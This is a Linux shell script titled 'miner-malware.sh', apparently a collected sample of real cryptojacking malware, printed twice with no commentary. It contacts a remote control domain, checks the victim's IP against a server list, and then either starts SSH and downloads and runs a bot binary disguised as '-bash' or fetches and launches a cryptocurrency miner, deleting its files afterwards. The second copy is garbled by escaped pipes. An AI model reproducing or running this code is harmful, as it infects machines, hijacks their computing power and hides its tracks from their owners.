Bharat-B/miner-malware.sh

## miner-malware.sh
#!/bin/sh

domain="pw.pwndns.pw"
root=$(id -u)
ARCH=$(uname -m)
if which curl > /dev/null 2>&1;	then
	dl="curl --fail --silent --connect-timeout 5 --max-time 10 --retry 1 -o"
	read="curl --fail --silent --connect-timeout 5 --max-time 10 --retry 1"
elif which url > /dev/null 2>&1;	then
	dl="url --fail --silent --connect-timeout 5 --max-time 10 --retry 1 -o"
	read="url --fail --silent --connect-timeout 5 --max-time 10 --retry 1"
elif which get > /dev/null 2>&1;	then
	dl="get -q --connect-timeout 5 --timeout 10 --tries 2 -O"
	read="get -q --connect-timeout 5 --timeout 10 --tries 2 -O-"
elif which wget > /dev/null 2>&1;	then
	dl="wget -q --connect-timeout 5 --timeout 10 --tries 2 -O"
	read="wget -q --connect-timeout 5 --timeout 10 --tries 2 -O-"
else
	dl=""
	read=""
fi
myip=$($read http://$domain/?ip)
servers=$($read http://$domain/servers/server.txt | grep $myip | wc -l)
if [ "$servers" = "1" ];	then
	pid=$(ps x | grep -v -e grep -e R | grep -e  "/usr/sbin/ddr" -e "ddrirc" -e "sshd$" | awk {'print $1'})
	if [ -z "$pid" ];	then
		if [ "$root" = "0" ];	then
			service ssh start
			service sshd start
			/etc/init.d/sshd start
		fi
		cd /dev/shm || cd /tmp ; rm -rf -- $ARCH $ARCH* .$ARCH* -bash;  $dl -bash http://$domain/bots/$ARCH ; chmod +x -- -bash ; ./-bash ; rm -rf -- -bash -bash* .-bash*
	# else
		# ps x | grep -v -e grep -e R | grep -e  "/usr/sbin/ddr" -e "ddrirc" -e "sshd$" | awk {'print $1'} | while read -r p; do kill -9 "$p"; done
		# rm -rf /tmp/.ddr
	fi
else
	ips=$(host xmr-rx0.pwndns.pw | awk {'print $4'} | while read -r ip; do echo " -e $ip ";done)
	ips="$ips -e 185.45.192.135"
	ssips=$(ss -np | grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' | sort | uniq | grep $ips)
	if [ -z "$ssips" ];	then
		cd /var/tmp/ || cd /tmp/ ; rm -rf -- $ARCH $ARCH* .$ARCH* -bash ; $dl -bash http://$domain/miners/$ARCH ; chmod +x -- -bash ; ./-bash -c -k -dp 443 -tls -p 443 -tls -dp 3333 -p 3333 -d; rm -rf -- -bash .$ARCH* $ARCH*
	fi
fi
	#!/bin/sh

	domain="pw.pwndns.pw"
	root=$(id -u)
	ARCH=$(uname -m)
	if which curl > /dev/null 2>&1; then
	dl="curl --fail --silent --connect-timeout 5 --max-time 10 --retry 1 -o"
	read="curl --fail --silent --connect-timeout 5 --max-time 10 --retry 1"
	elif which url > /dev/null 2>&1; then
	dl="url --fail --silent --connect-timeout 5 --max-time 10 --retry 1 -o"
	read="url --fail --silent --connect-timeout 5 --max-time 10 --retry 1"
	elif which get > /dev/null 2>&1; then
	dl="get -q --connect-timeout 5 --timeout 10 --tries 2 -O"
	read="get -q --connect-timeout 5 --timeout 10 --tries 2 -O-"
	elif which wget > /dev/null 2>&1; then
	dl="wget -q --connect-timeout 5 --timeout 10 --tries 2 -O"
	read="wget -q --connect-timeout 5 --timeout 10 --tries 2 -O-"
	else
	dl=""
	read=""
	fi
	myip=$($read http://$domain/?ip)
	servers=$($read http://$domain/servers/server.txt \| grep $myip \| wc -l)
	if [ "$servers" = "1" ]; then
	pid=$(ps x \| grep -v -e grep -e R \| grep -e "/usr/sbin/ddr" -e "ddrirc" -e "sshd$" \| awk {'print $1'})
	if [ -z "$pid" ]; then
	if [ "$root" = "0" ]; then
	service ssh start
	service sshd start
	/etc/init.d/sshd start
	fi
	cd /dev/shm \|\| cd /tmp ; rm -rf -- $ARCH $ARCH* .$ARCH* -bash; $dl -bash http://$domain/bots/$ARCH ; chmod +x -- -bash ; ./-bash ; rm -rf -- -bash -bash* .-bash*
	# else
	# ps x \| grep -v -e grep -e R \| grep -e "/usr/sbin/ddr" -e "ddrirc" -e "sshd$" \| awk {'print $1'} \| while read -r p; do kill -9 "$p"; done
	# rm -rf /tmp/.ddr
	fi
	else
	ips=$(host xmr-rx0.pwndns.pw \| awk {'print $4'} \| while read -r ip; do echo " -e $ip ";done)
	ips="$ips -e 185.45.192.135"
	ssips=$(ss -np \| grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' \| sort \| uniq \| grep $ips)
	if [ -z "$ssips" ]; then
	cd /var/tmp/ \|\| cd /tmp/ ; rm -rf -- $ARCH $ARCH* .$ARCH* -bash ; $dl -bash http://$domain/miners/$ARCH ; chmod +x -- -bash ; ./-bash -c -k -dp 443 -tls -p 443 -tls -dp 3333 -p 3333 -d; rm -rf -- -bash .$ARCH* $ARCH*
	fi
	fi